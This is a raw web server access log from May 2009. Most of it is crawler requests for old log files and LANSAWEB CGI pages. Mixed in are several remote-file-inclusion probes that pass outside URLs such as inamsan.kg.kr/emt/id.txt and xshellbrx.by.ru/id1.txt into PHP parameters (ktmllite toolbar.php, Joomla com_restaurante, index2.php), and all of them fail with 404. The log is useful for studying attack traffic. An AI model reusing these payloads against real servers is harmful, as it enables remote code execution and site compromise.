85.23.66.89 - - [30/May/2009:01:05:45 -0400] "GET /logs/error_log.Q108052600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:47 -0400] "GET /logs/error_log.Q108060200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:51 -0400] "GET /logs/error_log.Q108061400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:53 -0400] "GET /logs/error_log.Q108062800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:54 -0400] "GET /logs/error_log.Q108082000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:56 -0400] "GET /logs/error_log.Q108091200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:57 -0400] "GET /logs/error_log.Q108091300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:59 -0400] "GET /logs/error_log.Q108092900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:01 -0400] "GET /logs/error_log.Q108101200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:02 -0400] "GET /logs/error_log.Q108110200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:04 -0400] "GET /logs/error_log.Q108110700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
91.149.157.130 - - [30/May/2009:01:06:05 -0400] "GET /logs/access_log.Q109051700//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:01:06:05 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:01:06:05 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.23.66.89 - - [30/May/2009:01:06:05 -0400] "GET /logs/error_log.Q108111300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:07 -0400] "GET /logs/error_log.Q108111600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:08 -0400] "GET /logs/error_log.Q108120200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:10 -0400] "GET /logs/error_log.Q109021300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:12 -0400] "GET /robots.txt HTTP/1.0" 404 208 "http://majestic12.co.uk/bot.php?I=9C9BB7B76C-00A0F9232682C757-www_aceonlinestore_com" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C1F131C1896006F3F001%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:14 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C1F1B1FF86600749F011%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
91.149.157.130 - - [30/May/2009:01:06:15 -0400] "GET /logs/access_log.Q109050900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.23.66.89 - - [30/May/2009:01:06:16 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C481216C8F500C81F093%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C6E1018F86500AF7F08F%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C6E1E1B985500517F08F%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C6F181F9805004B7F08F%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C6F1913883500C11F08F%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C701F19A845005E4F08F%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C71101FC88500039F08F%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:30 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C7112143865008C2F08F%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
209.59.12.99 - - [30/May/2009:01:06:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.23.66.89 - - [30/May/2009:01:06:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C841710480500371F09C%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:33 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0C8D1A15F8B50068BF09F%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:34 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0CAA161828450056AF09P%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0CB9111F986500ED7F09W%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0CB91B1C186500E66F09W%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
91.149.157.130 - - [30/May/2009:01:06:39 -0400] "GET /logs/access_log.Q109050900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.23.66.89 - - [30/May/2009:01:06:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E0CC51F1FB82500679F09Z%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E4CBE191638A500075F051%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:43 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E4CC71B15C89700FACF081%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E5CCF121EC8000095CF001%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E5CDF1F1FF84400C09F011%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E5CE11E1DF86400449F041%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:55 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0E6D291D1AB8E000CFEF041%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F0B712B3E93110002A6052%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:06:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F3E512083B8C300D5FD001%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F7615188C69E800FD1206L%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:01 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F7B2B21271394006596072%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F7B2B222ED3A40077A6072%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F7B2B2A20B384006DA6072%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:06 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B55212E43E100E4C6091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B55232B33C100C3C6091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B55272023F1007796091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:11 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B552A244371006096091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B552F23530100C536091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B56212DC3F1008E96091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B56212FF301002046091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B56262FC341005FD6091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B56272183B1004E56091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L0F9B562F2E63B1008B66091%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:29 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0CCA151D98B500A67F085%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0CE81C1AA87500776F09D%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:32 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D28121F58E50045CF08M%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D28151C180500EBEF08M%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D281914888500A0BF08M%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D281C14D8F5001B0F08M%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D291418082500ECCF08M%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D291B12F85500F63F08M%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:45 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D2B1617F8050015DF08M%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
201.232.54.48 - - [30/May/2009:01:07:47 -0400] "GET /logs/access_log.Q109051500/index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.23.66.89 - - [30/May/2009:01:07:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D2B1A16C8250021DF08M%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:49 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D301A1ED8F500E64F09I%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D301A1F883500DF5F09I%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:52 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D311111386500566F09I%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D311115B80500301F09I%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:07:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D31121DF84500D84F09I%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:01 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D31151488A500CE2F09I%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L1E0D371913282500394F08P%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:04 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L7F6B242293E2A3006BA602A%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:06 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L7F6B242E9E72A3006AF602A%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L8F6B79209DF2E30032A6022%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20L8F6B792B9A62F30032F6022%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:11 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20LCF6B6A2293123300B616013%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT%20LCF6B6A269BF213009656013%20M37%20ENG HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:14 -0400] "GET /cgi-bin/lansaweb?procfun%20wordpr01%20stopprm%20M37%20funcparms%20RUCUSTA0070:0091598%20RUUSERA0100:LAUDENBACH HTTP/1.0" 408 514 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
91.149.157.130 - - [30/May/2009:01:08:17 -0400] "GET /logs/error_log.Q108052600/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.23.66.89 - - [30/May/2009:01:08:18 -0400] "GET /logs/access_log.Q HTTP/1.0" 404 215 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:20 -0400] "GET /logs/access_log.Q108101000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:22 -0400] "GET /logs/access_log.Q108102900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:23 -0400] "GET /logs/access_log.Q108103100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:25 -0400] "GET /logs/access_log.Q108110800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:27 -0400] "GET /logs/access_log.Q108111600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:28 -0400] "GET /logs/access_log.Q108112400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:30 -0400] "GET /logs/access_log.Q108112600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:32 -0400] "GET /logs/access_log.Q108113000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:35 -0400] "GET /logs/access_log.Q108120600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:36 -0400] "GET /logs/access_log.Q108121300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:38 -0400] "GET /logs/access_log.Q108121400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:39 -0400] "GET /logs/access_log.Q108121600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:41 -0400] "GET /logs/access_log.Q108122600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:42 -0400] "GET /logs/access_log.Q108123100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:46 -0400] "GET /logs/access_log.Q109010400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:48 -0400] "GET /logs/access_log.Q109011000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:49 -0400] "GET /logs/access_log.Q109011700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:51 -0400] "GET /logs/access_log.Q109011800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:53 -0400] "GET /logs/access_log.Q109012500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:54 -0400] "GET /logs/access_log.Q109020400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:56 -0400] "GET /logs/access_log.Q109020800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
